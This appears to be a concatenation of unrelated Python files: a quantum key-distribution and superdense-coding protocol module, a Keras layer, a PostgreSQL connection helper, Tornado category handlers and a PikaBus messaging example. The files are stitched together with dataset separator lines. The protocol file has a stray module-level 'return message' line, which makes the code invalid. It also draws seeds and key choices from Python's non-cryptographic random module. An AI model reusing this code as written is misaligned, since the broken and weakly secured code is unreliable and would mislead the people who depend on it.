        :param connection: `~qchat.connection.QChatConnection`
            A QChatConnection object
        :param ctrl_msg_q: list
            Queue containing inbound messages from our peer
        :param outbound_q: queue-like object (must support put())
            Queue containing outbound messages to our peer
        :param role: int
            Either LEADER_ROLE or FOLLOW_ROLE for coordinating the protocol
        :param relay_info: dict
            Qubit source relay information, passed through to the device
        """
        self.logger = QChatLogger(__name__)
        # QChat connection interface
        self.connection = connection
        # The inbound control message queue
        self.ctrl_msg_q = ctrl_msg_q
        # The outbound message queue
        self.outbound_q = outbound_q
        # Peer information for the communication in the protocol
        self.peer_info = peer_info
        # Qubit source relay information
        self.relay_info = relay_info
        # The role we are assuming for the protocol
        self.role = role
        # Perform preliminary steps of the protocol
        if role == LEADER_ROLE:
            self.device = LeadDevice(self.connection, self.relay_info)
            self._lead_protocol()
        elif role == FOLLOW_ROLE:
            self.device = FollowDevice(self.connection, self.relay_info)
            self._follow_protocol()
    @abc.abstractmethod
    def _lead_protocol(self):
        """
        Placeholder for what the leader of the protocol should do
        """
        raise NotImplementedError
    @abc.abstractmethod
    def _follow_protocol(self):
        """
        Placeholder for what the follower of the protocol should do
        """
        raise NotImplementedError
    def _wait_for_control_message(self, idle_timeout=IDLE_TIMEOUT, message_type=None):
        """
        Waits for a control message from our peer in blocking mode
        :param idle_timeout: int
            The number of seconds to wait before aborting the protocol
        :param message_type: `~qchat.messages.Message`
            The class of the type of control message we are expecting
        :return: `~qchat.messages.Message`
            The message that we received
        """
        # Wait for a message (poll every 5ms so we don't spin hard)
        wait_start = time.time()
        while True:
            curr_time = time.time()
            if curr_time - wait_start > idle_timeout:
                raise ProtocolException("Timed out waiting for control message")
            if self.ctrl_msg_q:
                break
            else:
                time.sleep(0.005)
        # Grab the newest message
        message = self.ctrl_msg_q.pop(0)
        # Verify it is routed to the correct place.  NOTE(review): a message of
        # the wrong type has already been popped at this point, so it is dropped
        # rather than left on the queue — confirm this is intended.
        if not isinstance(message, message_type):
            raise ProtocolException("Received incorrect control message")
        return message
    def _send_control_message(self, message_data, message_type):
        """
        Sends a control message to our peer
        :param message_data: bytes/str/dict
            The message data we want to send
        :param message_type: `~qchat.messages.Message`
            The class of the type of message we want to send
        :return: None
        """
        message = message_type(sender=self.connection.name, message_data=message_data)
        self.outbound_q.put((self.peer_info["user"], message))
    def exchange_messages(self, message_data, message_type):
        """
        Exchanges messages with our peer.  The leader sends first and then
        waits; the follower waits first and then sends, so the two halves of
        the exchange cannot deadlock.
        :param message_data: bytes/str/dict
            The message data we want to send
        :param message_type: `~qchat.messages.Message`
            The class of the message type we are expecting/wanting to send
        :return: `~qchat.messages.Message`
            The message we received from our peer
        """
        if self.role == LEADER_ROLE:
            self._send_control_message(message_data=message_data, message_type=message_type)
            return self._wait_for_control_message(message_type=message_type)
        else:
            m = self._wait_for_control_message(message_type=message_type)
            self._send_control_message(message_data=message_data, message_type=message_type)
            return m
class QChatKeyProtocol(QChatProtocol):
    """
    Base class for key-generation protocols; implements the basic start/end
    signalling.  Subclasses must define the class attributes ``name`` and
    ``message_type``, which are used by the handshake methods below.
    """
    def __init__(self, key_size, **kwargs):
        # The desired key size in bytes
        self.key_size = key_size
        super().__init__(**kwargs)
    def _lead_protocol(self):
        """
        Initiates a key generation protocol by announcing the protocol name
        and desired key size, then waiting for the peer's acknowledgement
        :return: None
        """
        self._send_control_message(message_data={"name": self.name, "key_size": self.key_size},
                                   message_type=PTCLMessage)
        response = self._wait_for_control_message(message_type=self.message_type)
        if response.data["ACK"] != "ACK":
            raise ProtocolException("Failed to establish leader/role")
    def _follow_protocol(self):
        """
        Initiates the following of a key generation protocol by acknowledging
        the leader's announcement
        :return: None
        """
        self._send_control_message(message_data={"ACK": "ACK"}, message_type=self.message_type)
    def _end_protocol(self):
        """
        Concludes a key generation protocol with a mutual FIN exchange
        :return: None
        """
        m = self.exchange_messages(message_data={"FIN": True}, message_type=self.message_type)
        if not m.data["FIN"]:
            raise ProtocolException("Failed to terminate {} protocol".format(self.name))
class BB84_Purified(QChatKeyProtocol):
    """
    Implements the Purified BB84 protocol
    With a 16 byte key and noiseless channel we distribute a total of 1200 qubits per participant
    """
    name = "BB84_PURIFIED"
    message_type = BB84Message
    def _receive_bb84_states(self):
        """
        Method is intended to receive the distributed qubits from the EPR pair.
        :return: tuple of lists
            The measurement outcomes and the bases used for them
        """
        # Lists for the measurement/basis information
        x = []
        theta = []
        # Distribute ROUND_SIZE qubits
        while len(x) < ROUND_SIZE:
            # Request our EPR source to distribute the pairs
            if self.role == LEADER_ROLE:
                self.logger.debug("Requesting EPR pair with {}".format(self.peer_info["user"]))
                self.device.requestEPR(self.peer_info["user"])
            # Receive our half of the EPR pair
            self.logger.debug("Trying to receive EPR pair")
            q = self.device.receiveEPR()
            self.logger.debug("Successfully received!")
            # Randomly measure in Hadamard/Standard basis
            basisflip = random.randint(0, 1)
            if basisflip:
                q.H()
            # Store the measurement/basis information
            theta.append(basisflip)
            x.append(q.measure())
            # Let peer know we are ready for the next qubit
            r = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
            if not r.data["ack"]:
                raise ProtocolException("Error distributing EPR states")
        return x, theta
    def _filter_theta(self, x, theta):
        """
        Used to filter our measurements that were done with differing basis between the two peers in the protocol
        :param x: list
            A list of the measurement outcomes
        :param theta: list
            A list of the basis used for producing the measurement outcomes
        :return: list
            The remaining measurement outcomes with matching basis with our peer
        """
        # Exchange basis information
        response = self.exchange_messages(message_data={"theta": theta}, message_type=BB84Message)
        theta_hat = response.data["theta"]
        x_remain = []
        for bit, basis, basis_hat in zip(x, theta, theta_hat):
            # Only retain measurements that were performed in the same basis
            if basis == basis_hat:
                x_remain.append(bit)
        return x_remain
    def _estimate_error_rate(self, x):
        """
        Estimates the error rate of the exchanged BB84 information.  The test
        bits used for the estimate are popped from *x*, so the caller's list
        is consumed in place.
        :param x: list
            The measurement outcomes obtained
        :return: float
            The error rate of the communicated information (1 if no test bits
            were available)
        """
        test_bits = []
        test_indices = []
        # As leader we distribute the selected test indices
        if self.role == LEADER_ROLE:
            # Randomly choose a subset of indices to use for testing
            while len(test_indices) < ROUND_SIZE // 4 and len(x) > 0:
                # Choose a index we still have
                index = random.randint(0, len(x) - 1)
                # Store the test bit and index.  Both peers pop the same
                # indices in the same order, so the bits stay aligned.
                test_bits.append(x.pop(index))
                test_indices.append(index)
            # Send the information and wait for an acknowledgement
            r = self.exchange_messages(message_data={"test_indices": test_indices}, message_type=BB84Message)
            if not r.data["ack"]:
                raise ProtocolException("Error sending test indices")
        # As follower we receive the test indices
        elif self.role == FOLLOW_ROLE:
            # Receive the indices and respond with an acknowledgment
            m = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
            test_indices = m.data["test_indices"]
            # Construct the test bit information on our end
            for index in test_indices:
                test_bits.append(x.pop(index))
        # Exchange test bits with our peer
        m = self.exchange_messages(message_data={"test_bits": test_bits}, message_type=BB84Message)
        target_test_bits = m.data["test_bits"]
        # Calculate the error rate of same basis bits
        num_error = 0
        for t1, t2 in zip(test_bits, target_test_bits):
            if t1 != t2:
                num_error += 1
        # Conclude the error estimation with our peer
        r = self.exchange_messages(message_data={"fin": True}, message_type=BB84Message)
        if not r.data["fin"]:
            raise ProtocolException("Error coordinating error estimation")
        if test_bits:
            error = (num_error / len(test_bits))
        else:
            error = 1
        return error
    def _reconcile_information(self, x, ecc=ECC_Golay()):
        """
        Information Reconciliation based on linear codes
        :param x: list
            Set of codewords
        :return: tuple (list, list)
            The leftover bits that did not fill a whole codeword, and the
            reconciled bits produced so far
        """
        reconciled = []
        # Iterate through the codewords we have available
        for codeword in ecc.chunk(x):
            # Recycle any remaining codeword bits and the reconciled information
            if len(codeword) < ecc.codeword_length:
                return codeword, reconciled
            # As leader we send a syndrome string of the information we have
            if self.role == LEADER_ROLE:
                # Encode the codeword and send the information
                s = ecc.encode(codeword)
                m = self.exchange_messages(message_data={"s": s}, message_type=BB84Message)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to reconcile secrets")
            # As follower we receive the error correcting codes and correct information on our end
            elif self.role == FOLLOW_ROLE:
                m = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
                s = m.data["s"]
                # Store the reconciled information
                reconciled += ecc.decode(codeword, s)
        # Managed to have all valid length codewords, no remaining secret bits
        return [], reconciled
    def _amplify_privacy(self, X):
        """
        One-round privacy amplification sourced from https://eprint.iacr.org/2010/456.pdf
        :param X: bytes
            A bytestring of the information we wish to distill
        :return: bytes
            A single privacy-amplified byte from X, or b'' if verification
            failed and the round must be retried
        """
        # As leader we select an Y to use as a seed for our extractor
        if self.role == LEADER_ROLE:
            # Select the seed
            Y = random.randint(0, 2 ** 8 - 1)
            # Calculate the extracted data and tag
            temp = (Y * X[0]).to_bytes(2, 'big')
            R = temp[0]
            T = temp[1] + X[1]
            # Send seed and tag to peer
            m = self.exchange_messages(message_data={"Y": Y, "T": T}, message_type=BB84Message)
            # If failure some information may not have been correctly reconciled
            if not m.data["ack"]:
                return b''
        # As follower we receive the seed and tag and verify the extracted data
        elif self.role == FOLLOW_ROLE:
            # Get seed/tag from peer
            m = self._wait_for_control_message(message_type=BB84Message)
            Y = m.data["Y"]
            T = m.data["T"]
            # Calculate the extracted information on our end
            temp = (Y * X[0]).to_bytes(2, 'big')
            # Verify the tag
            if T != X[1] + temp[1]:
                self._send_control_message(message_data={"ack": False}, message_type=BB84Message)
                return b''
            # Get extracted randomness if tag passes
            R = temp[0]
            self._send_control_message(message_data={"ack": True}, message_type=BB84Message)
        # Return extracted byte
        return R.to_bytes(1, 'big')
    def distill_tested_data(self):
        """
        A wrapper for distributing the BB84 states between the two users and tests the error rate
        of the measured data
        :return: list
            A list of the shared secret bits (empty when the estimated error
            rate is too high to reconcile)
        """
        # Get measurement/basis data
        x, theta = self._receive_bb84_states()
        # Filter measurements we didn't match bases on
        x_remain = self._filter_theta(x=x, theta=theta)
        # Calculate the error rate of test information, remove the test data
        error_rate = self._estimate_error_rate(x_remain)
        # Abort the protocol if we have too high of an error rate to reconcile information with
        if error_rate >= MAX_GOLAY_ERROR:
            return []
        # Return the secret data
        return x_remain
    def execute(self):
        """
        A wrapper for the entire key derivation protocol
        :return: bytes
            Derived key of byte length key_size
        """
        self.logger.info("Beginning protocol {}".format(self.name))
        key = b''
        secret_bits = []
        reconciled = []
        # Continue the protocol until we have a full key
        while len(key) < self.key_size:
            # Privacy amplification requires two bytes of reconciled data
            while len(reconciled) < 2*BYTE_LEN:
                # Golay Error Correction requires 23 bits of data per code word
                while len(secret_bits) < ECC_Golay.codeword_length:
                    secret_bits += self.distill_tested_data()
                    self.logger.debug("Secret bits: {}".format(secret_bits))
                # Reconcile codeword multiple of bits from the exchanged information
                secret_bits, reconciled_bits = self._reconcile_information(secret_bits)
                reconciled += reconciled_bits
                self.logger.debug("Reconciled: {}".format(reconciled))
            # Convert the reconciled data into bytes that can be passed to privacy amplification
            reconciled_bytes = int(''.join([str(i) for i in reconciled[:2*BYTE_LEN]]), 2).to_bytes(2, 'big')
            reconciled = reconciled[2*BYTE_LEN:]
            # Extract randomness from our reconciled information
            key += self._amplify_privacy(reconciled_bytes)
            self.logger.debug(key)
            self.logger.info("Generated {} of {} bytes".format(len(key), self.key_size))
        self.logger.debug("Derived key {}".format(key))
        self._end_protocol()
        return key
class DIQKD(BB84_Purified):
    """
    Implements a device independent version of the purified BB84 protocol
    Currently the logic for the EPR CHSH test appears sound, though the devices used
    do not implement measurements that approach the CHSH maximum winning probability
    """
    name = "DIQKD"
    message_type = DQKDMessage
    def _device_independent_distribute_bb84(self):
        """
        Implements the leading role of the DIQKD protocol
        :return: tuple of lists
            The measurement/basis information obtained
        """
        # Prepare our random set of measurements (the leader uses two settings, 0 or 1)
        theta = [random.randint(0, 1) for _ in range(ROUND_SIZE)]
        x = []
        for b in theta:
            # As leader we request an EPR pair from the source
            self.device.requestEPR(self.peer_info["user"])
            # Grab our half of the EPR pair
            q = self.device.receiveEPR()
            # Have our device measure the qubit for us
            x.append(self.device.measure(q, b))
            # Let peer know we are ready to proceed
            m = self.exchange_messages(message_data={"ack": True}, message_type=DQKDMessage)
            if not m.data["ack"]:
                raise ProtocolException("Error distributing DI states")
        return x, theta
    def _device_independent_receive_bb84(self):
        """
        Implements the following role of the DIQKD protocol
        :return: tuple of lists
            The measurement/basis information
        """
        # Prepare our random set of measurements (the follower uses three settings, 0..2)
        theta = [random.randint(0, 2) for _ in range(ROUND_SIZE)]
        x = []
        for b in theta:
            # Receive our half of the EPR
            q = self.device.receiveEPR()
            # Have our device measure the qubit for us
            x.append(self.device.measure(q, b))
            # Let peer know we are ready to proceed
            m = self.exchange_messages(message_data={"ack": True}, message_type=DQKDMessage)
            if not m.data["ack"]:
                raise ProtocolException("Error receiving DI states")
        return x, theta
    def _device_independent_epr_test(self, x, theta):
        """
        Implements the CHSH EPR test for the DIQKD protocol, tests whether a subset of test bits
        are entangled
        :param x: list
            A list of the measurement outcomes
        :param theta: list
            A list of the basis used for producing the measurement outcomes
        :return: list
            The remaining measurement outcomes with matching basis with our peer
        """
        # Exchange basis information with our peer
        m = self.exchange_messages(message_data={"theta": theta}, message_type=DQKDMessage)
        theta_hat = m.data["theta"]
        # As the leader we will compute the indices comprising the test set
        if self.role == LEADER_ROLE:
            # Uniformly random subset
            T = random.sample(range(len(x)), len(x) // 2)
            # Let our peer know what the subset is
            self._send_control_message(message_data={"T": T}, message_type=DQKDMessage)
            # Tp is the subset of test rounds we will use for the CHSH test
            Tp = [j for j in T if theta_hat[j] in [0, 1]]
            # Tpp is the subset of test rounds we will use for a matching test
            Tpp = [j for j in T if theta[j] == 0 and theta_hat[j] == 2]
            # R is the remaining bits not in the test set
            R = [j for j in set(range(len(x))) - set(T) if theta[j] == 0 and theta_hat[j] == 2]
        # As the follower we will construct the test set as per the leader's specification
        elif self.role == FOLLOW_ROLE:
            # Wait for the test indices
            m = self._wait_for_control_message(message_type=DQKDMessage)
            T = m.data["T"]
            # Tp is the subset of test rounds we will use for the CHSH test
            Tp = [j for j in T if theta[j] in [0, 1]]
            # Tpp is the subset of test rounds we will use for a matching test
            Tpp = [j for j in T if theta_hat[j] == 0 and theta[j] == 2]
            # R is the remaining bits not in the test set
            R = [j for j in set(range(len(x))) - set(T) if theta_hat[j] == 0 and theta[j] == 2]
        # Now we exchange the actual test measurements for the tests
        x_T = [x[j] for j in T]
        m = self.exchange_messages(message_data={"x_T": x_T}, message_type=DQKDMessage)
        x_T_hat = m.data["x_T"]
        # Calculate the number of rounds that pass the CHSH game
        winning = [j for j, x1, x2 in zip(T, x_T, x_T_hat) if (x1 ^ x2) == (theta[j] & theta_hat[j]) and j in Tp]
        # Calculate the probability of winning the CHSH game using the device's implemented measurements
        p_win = len(winning) / len(Tp)
        # Calculate the number of rounds that matched when measured in the "same basis"
        matching = [j for j, x1, x2 in zip(T, x_T, x_T_hat) if x1 == x2 and j in Tpp]
        # Calculate the error rate of the "same basis" measurements
        p_match = len(matching) / len(Tpp)
        # Set the tolerance for the test results
        e = 0.1
        if p_win < PCHSH - e or p_match < 1 - e:
            self.logger.debug(x_T)
            self.logger.debug(x_T_hat)
            self.logger.debug("CHSH Winners: {} out of {}".format(len(winning), Tp))
            self.logger.debug("Matching: {} out of {}".format(len(matching), Tpp))
            raise ProtocolException("Failed to pass CHSH test: p_win: {} p_match: {}".format(p_win, p_match))
        # Return the remaining secret measurement results
        x_remain = [x[r] for r in R]
        return x_remain
    def distill_device_independent_data(self):
        """
        Filters out any measurements that were not performed in accordance with the peer
        :return: list
            A list of measurement outcomes
        """
        # Obtain sets of measurement/basis
        if self.role == LEADER_ROLE:
            x, theta = self._device_independent_distribute_bb84()
        elif self.role == FOLLOW_ROLE:
            x, theta = self._device_independent_receive_bb84()
        self.logger.debug("Beginning EPR Tests")
        # Test some of the data to ensure the devices we are using "qualify"
        x_remain = self._device_independent_epr_test(x, theta)
        return x_remain
    def execute(self):
        """
        A wrapper for the entire key derivation protocol
        :return: bytes
            Derived key of byte length key_size
        """
        self.logger.info("Beginning protocol {}".format(self.name))
        key = b''
        secret_bits = []
        reconciled = []
        # Continue the protocol until we have a full key
        while len(key) < self.key_size:
            # Privacy amplification requires two bytes of reconciled data
            while len(reconciled) < 2*BYTE_LEN:
                # Golay Error Correction requires 23 bits of data per code word
                while len(secret_bits) < ECC_Golay.codeword_length:
                    secret_bits += self.distill_device_independent_data()
                    self.logger.debug("Secret bits: {}".format(secret_bits))
                # Reconcile codeword multiple of bits from the exchanged information
                secret_bits, reconciled_bits = self._reconcile_information(secret_bits)
                reconciled += reconciled_bits
                self.logger.debug("Reconciled: {}".format(reconciled))
            # Convert the reconciled data into bytes that can be passed to privacy amplification
            reconciled_bytes = int(''.join([str(i) for i in reconciled[:2*BYTE_LEN]]), 2).to_bytes(2, 'big')
            reconciled = reconciled[2*BYTE_LEN:]
            # Extract randomness from our reconciled information
            key += self._amplify_privacy(reconciled_bytes)
            self.logger.debug(key)
            self.logger.info("Generated {} of {} bytes".format(len(key), self.key_size))
        self.logger.debug("Derived key {}".format(key))
        self._end_protocol()
        return key
class QChatMessageProtocol(QChatProtocol):
    """
    Base class for qubit based messaging protocols.  Subclasses must define
    the class attributes ``name`` and ``message_type``, which are used by the
    handshake methods below.
    """
    def _lead_protocol(self):
        """
        Sends the protocol message that initiates the protocol
        :return: None
        """
        self._send_control_message(message_data={"name": self.name}, message_type=PTCLMessage)
        response = self._wait_for_control_message(message_type=self.message_type)
        if response.data["ACK"] != "ACK":
            raise ProtocolException("Failed to establish leader/role")
    def _follow_protocol(self):
        """
        Responds to the protocol message so that peers are in sync
        :return: None
        """
        self._send_control_message(message_data={"ACK": "ACK"}, message_type=self.message_type)
    def _end_protocol(self):
        """
        Sends a FINish message to mark the end of the protocol
        :return: None
        """
        m = self.exchange_messages(message_data={"FIN": True}, message_type=self.message_type)
        if not m.data["FIN"]:
            raise ProtocolException("Failed to terminate {} protocol".format(self.name))
class SuperDenseCoding(QChatMessageProtocol):
    """
    Implements sending SuperDense Coded data: two classical bits are encoded
    into each transmitted qubit of a shared EPR pair.
    """
    name = "SUPERDENSE"
    message_type = SPDSMessage
    def send_message(self, message):
        """
        Implements streaming data to the user using qubits
        :param message: bytes
            A bytestring representing the data to send
        :return: None
        """
        self.logger.info("Beginning protocol {}".format(self.name))
        # Grab our peer's cqc host name
        user = self.peer_info["user"]
        m = self.exchange_messages(message_data={"message_length": len(message)}, message_type=self.message_type)
        if not m.data["ack"]:
            raise ProtocolException("Failed to transmit message length")
        # Process each byte of the message individually
        for b in message:
            # Process the bits of the message in pairs
            for p in range(4):
                # Obtain the bits from the byte.  Note: '+' binds tighter than
                # '>>' in Python, so `b >> (2*p) + 1` is `b >> (2*p + 1)`,
                # matching the receiver's `b1 << (2*p + 1)` below.
                b2 = (b >> 2*p) & 1
                b1 = (b >> (2*p) + 1) & 1
                # Share an EPR state with our peer
                qa = self.connection.cqc.createEPR(user)
                # Let our peer know their half of the EPR is ready
                m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to send {}'s qubit".format(user))
                # Encode the bits into our half of the EPR pair
                if b2:
                    qa.X()
                if b1:
                    qa.Z()
                # Transmit our half to our peer
                self.connection.cqc.sendQubit(qa, user)
                # Let our peer know they can receive our half
                m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to send EPR to {}".format(user))
                # Wait until our peer is ready to receive next EPR
                m = self._wait_for_control_message(message_type=self.message_type)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to send EPR to {}".format(user))
        self._end_protocol()
    def receive_message(self):
        """
        Receives a superdense coded message
        :return: bytes
            Bytestring encoding the received message
        """
        self.logger.info("Beginning protocol {}".format(self.name))
        user = self.peer_info["user"]
        # Get the message length from the sender
        m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
        message_length = m.data["message_length"]
        message = b''
        # NOTE(review): the loop variable `b` is immediately shadowed and
        # reused as the byte accumulator; only the iteration count matters.
        for b in range(message_length):
            b = 0
            for p in range(4):
                # Wait to know that EPR is ready
                m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to receive half of EPR")
                # Get EPR half
                qb = self.connection.cqc.recvEPR()
                # Wait for peer to finish encoding
                m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
                if not m.data["ack"]:
                    raise ProtocolException("Failed to obtain {}'s half of the EPR".format(user))
                # Get peer's half of the EPR
                qa = self.connection.cqc.recvQubit()
                # Decode the encoded information (Bell measurement)
                qa.cnot(qb)
                qa.H()
                b1 = qa.measure()
                b2 = qb.measure()
                # Store it in our current byte
                b |= (b2 << 2*p)
                b |= (b1 << (2*p + 1))
                # Let our peer know we are ready for the next EPR pair
                self._send_control_message(message_data={"ack": True}, message_type=self.message_type)
            message += b.to_bytes(1, 'big')
        self.logger.info("Received SuperDense message from {}: {}".format(user, message))
        self._end_protocol()
        return message
return message
class ProtocolFactory:
    """Resolves a protocol's name to the class object implementing it."""
    def __init__(self):
        # Build the registry from each protocol class's own `name` attribute.
        self.protocol_mapping = {
            cls.name: cls
            for cls in (BB84_Purified, DIQKD, SuperDenseCoding)
        }
    def createProtocol(self, name):
        """Return the protocol class registered under *name*, or None."""
        return self.protocol_mapping.get(name)
| StarcoderdataPython |
3259207 | <reponame>klarh/geometric_algebra_attention<filename>geometric_algebra_attention/keras/Multivector2MultivectorAttention.py
from tensorflow import keras
from .. import base
from .MultivectorAttention import MultivectorAttention
class Multivector2MultivectorAttention(base.Multivector2MultivectorAttention, MultivectorAttention):
    # Reuse the base class's documentation; a literal docstring here would be
    # overridden by this assignment anyway.
    __doc__ = base.Multivector2MultivectorAttention.__doc__
    def __init__(self, score_net, value_net, scale_net, reduce=True,
                 merge_fun='mean', join_fun='mean', rank=2,
                 invariant_mode='single', covariant_mode='partial',
                 include_normalized_products=False, **kwargs):
        # Initialize both bases explicitly: the multivector-output base takes
        # the scale network, the attention base takes everything else.
        base.Multivector2MultivectorAttention.__init__(self, scale_net=scale_net)
        MultivectorAttention.__init__(
            self, score_net=score_net, value_net=value_net,
            reduce=reduce, merge_fun=merge_fun, join_fun=join_fun, rank=rank,
            invariant_mode=invariant_mode, covariant_mode=covariant_mode,
            include_normalized_products=include_normalized_products,
            **kwargs)
    @classmethod
    def from_config(cls, config):
        # Rebuild the serialized scale network before delegating; get_config()
        # below stores it as a Sequential config dict.
        new_config = dict(config)
        for key in ('scale_net',):
            new_config[key] = keras.models.Sequential.from_config(new_config[key])
        return super(Multivector2MultivectorAttention, cls).from_config(new_config)
    def get_config(self):
        # Serialize the scale network alongside the base configuration so
        # from_config() can round-trip it.
        result = super().get_config()
        result['scale_net'] = self.scale_net.get_config()
        return result
# Register the layer with Keras so saved models referencing it by name can be
# deserialized without an explicit custom_objects argument.
keras.utils.get_custom_objects()['Multivector2MultivectorAttention'] = Multivector2MultivectorAttention
| StarcoderdataPython |
1928577 | import os
from dotenv import load_dotenv
import psycopg2
import traceback
# Load local environment overrides before reading configuration.
load_dotenv("./.env.local")
# Lazily-initialized module-level connection state (connection, cursor, and a
# shorthand for cursor.execute); populated by connect().
con = cur = db = None
# NOTE(review): the environment variable is DATABASE_URI but it is bound to
# the name DATABASE_URL — confirm the naming mismatch is intentional.
if 'DATABASE_URI' in os.environ:
    DATABASE_URL = os.environ['DATABASE_URI']
else:
    raise ValueError('Env Var not found!')
def connect():
    """Open a database connection and bind the module-level con/cur/db.

    On failure any open transaction is rolled back and the error is printed;
    the globals may remain None (or stale), so callers must tolerate that.
    """
    global con, cur, db
    try:
        con = psycopg2.connect(DATABASE_URL, sslmode='require')
        cur = con.cursor()
        # Shorthand: db(...) executes SQL on the shared cursor.
        db = cur.execute
    except psycopg2.DatabaseError as err:
        if con:
            con.rollback()
        print(err)
def get_db(force=False):
    """Return the shared (connection, cursor, execute) triple.

    Connects lazily on first use.  When *force* is true, any pending
    transaction is rolled back and the existing triple is returned as-is.
    """
    if force:
        con.rollback()
        return (con, cur, db)
    if con and cur and db:
        return (con, cur, db)
    connect()
    return (con, cur, db)
def useDb(defaultReturn=None):
    """Decorator factory: inject the live (con, cur, db) into the wrapped call.

    The wrapped function receives the connection objects as the keyword
    arguments ``con``, ``cur`` and ``db``.  On a ``psycopg2.DatabaseError``
    the connection is refreshed (rollback via get_db(force=True)) and the
    call is retried exactly once; a failure during the retry, or any
    non-database error, is printed and *defaultReturn* is returned instead
    of raising.
    """
    def wrapper(func=None):
        def inner(*args, **kwargs):
            con, cur, db = get_db()
            # Retry path: we were re-invoked after a DatabaseError below.
            if "retrying" in kwargs and kwargs["retrying"]:
                try:
                    print("Retrying query")
                    # Drop the marker so the callee never sees it.
                    del kwargs["retrying"]
                    kwargs.update({"con": con, "cur": cur, "db": db, })
                    return func(*args, **kwargs)
                except:
                    # Second failure of any kind: give up with the default.
                    print(traceback.format_exc())
                    print(defaultReturn)
                    return defaultReturn
            try:
                kwargs.update({"con": con, "cur": cur, "db": db, })
                return func(*args, **kwargs)
            except psycopg2.DatabaseError:
                print(traceback.format_exc())
                # NOTE(review): this branch only triggers if a caller passed a
                # falsy `retrying` kwarg themselves — confirm it is reachable.
                if "retrying" in kwargs:
                    raise RuntimeError("Fatal Error occured!")
                else:
                    # Refresh the connection and retry once.
                    con, cur, db = get_db(force=True)
                    return inner(*args, **kwargs, retrying=True)
            except:
                # Non-database errors are swallowed into the default return.
                print(traceback.format_exc())
                return defaultReturn
        return inner
    return wrapper
| StarcoderdataPython |
1679817 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# author <NAME> <EMAIL>
# date 2015/11/27
import baseHandler
import tornado.web
from modules.db import db
import constants
import json
"""
determine whether the specified category is exist
"""
class IsCategoryExistHandler(baseHandler.RequestHandler):
    """Answers whether the current user already has a category with a name.

    GET parameter ``cate_name``: the category name to check.  Responds with
    ``{'success': True, 'exist': bool}`` when the parameter is present, or
    ``{'success': False, 'error_code': missing_parameters}`` otherwise.
    """
    @tornado.web.authenticated
    def get(self):
        category = self.get_query_argument('cate_name', None)
        if category:
            query_exist = 'select count(*) count from tb_category where name = %s and user_id = %s'
            num = db.get(query_exist, category, self.current_user.id)
            # Treat a missing row the same as a zero count.  The previous
            # `elif not num.count` raised AttributeError when num was None.
            exist = bool(num and num.count)
            self.write({'success': True, 'exist': exist})
            self.finish()
            return
        self.write({'success': False, 'error_code': constants.error_code['missing_parameters']})
        self.finish()
"""
add new category
"""
class AddHandler(baseHandler.RequestHandler):
    """Create a new category for the authenticated user."""

    @tornado.web.authenticated
    def post(self):
        category = self.get_body_argument('cate_name')
        if not category:
            return
        query_exist = 'select count(*) count from tb_category where name = %s and user_id = %s'
        existing = db.get(query_exist, category, self.current_user.id)
        if existing and existing.count:
            # Duplicate name for this user -- reject the insert.
            self.write({'success': False, 'error_code': constants.error_code['category_already_exist']})
            self.finish()
            return
        query_new = 'insert into tb_category (name, user_id, visible) values (%s, %s, %s)'
        new_id = db.insert(query_new, category, self.current_user.id, 1)
        if new_id:
            self.write({'success': True, 'category_id': new_id})
            self.finish()
"""
batch delete categories
"""
class BatchDeleteHandler(baseHandler.RequestHandler):
    """Delete one or more categories given as a comma separated id list."""

    @tornado.web.authenticated
    def post(self):
        categories = self.get_body_argument('categories', None)
        if categories:
            # Coerce every id through int() so only numeric values can ever
            # reach the interpolated SQL below (rejects injection attempts
            # with a ValueError, as the original int() casts already did).
            ids = [int(cate) for cate in categories.split(',')]
            # One uniform IN (...) clause replaces the two branches; it also
            # avoids the malformed SQL a one-element tuple repr would have
            # produced ("in (5,)").
            batch_delete = 'delete from tb_category where id in ({0})'.format(
                ', '.join(str(i) for i in ids))
            db.execute(batch_delete)
            self.write({'success': True})
            self.finish()
| StarcoderdataPython |
5083621 | <reponame>aherrera1721/hyhelper<filename>HyHelper/__init__.py
from .HyHelper_traj import *
from .HyHelper_plot import *
from .HyHelper_filters import *
from .AutoSplit import *
print('All files imported successfully. Welcome to HyHelper!') | StarcoderdataPython |
5063851 | import pika
import datetime
from PikaBus.abstractions.AbstractPikaBus import AbstractPikaBus
from PikaBus.PikaBusSetup import PikaBusSetup
def MessageHandlerMethod(**kwargs):
    """Example message handler.

    Handlers are plain callables taking ``**kwargs``; the bus invokes them
    with the full incoming pipeline data, the bus instance and the payload.
    A payload whose 'reply' flag is set is answered once, with the flag
    cleared so the reply itself does not trigger another reply.
    """
    data: dict = kwargs['data']
    bus: AbstractPikaBus = kwargs['bus']
    payload: dict = kwargs['payload']
    print(payload)
    if not payload['reply']:
        return
    payload['reply'] = False
    bus.Reply(payload=payload)
# Use pika connection params to set connection details
credentials = pika.PlainCredentials('amqp', 'amqp')
connParams = pika.ConnectionParameters(
    host='localhost',
    port=5672,
    virtual_host='/',
    credentials=credentials)
# Create a PikaBusSetup instance with a listener queue, and add the message handler method.
pikaBusSetup = PikaBusSetup(connParams,
                            defaultListenerQueue='myQueue',
                            defaultSubscriptions='myTopic')
pikaBusSetup.AddMessageHandler(MessageHandlerMethod)
# Start consuming messages from the queue.
pikaBusSetup.StartConsumers()
# Create a temporary bus to subscribe on topics and send, defer or publish messages.
bus = pikaBusSetup.CreateBus()
bus.Subscribe('myTopic')
# 'reply': True makes MessageHandlerMethod answer each delivery once.
payload = {'hello': 'world!', 'reply': True}
# To send a message means sending a message explicitly to one receiver.
bus.Send(payload=payload, queue='myQueue')
# To defer a message means sending a message explicitly to one receiver with some delay before it is processed.
bus.Defer(payload=payload, delay=datetime.timedelta(seconds=1), queue='myQueue')
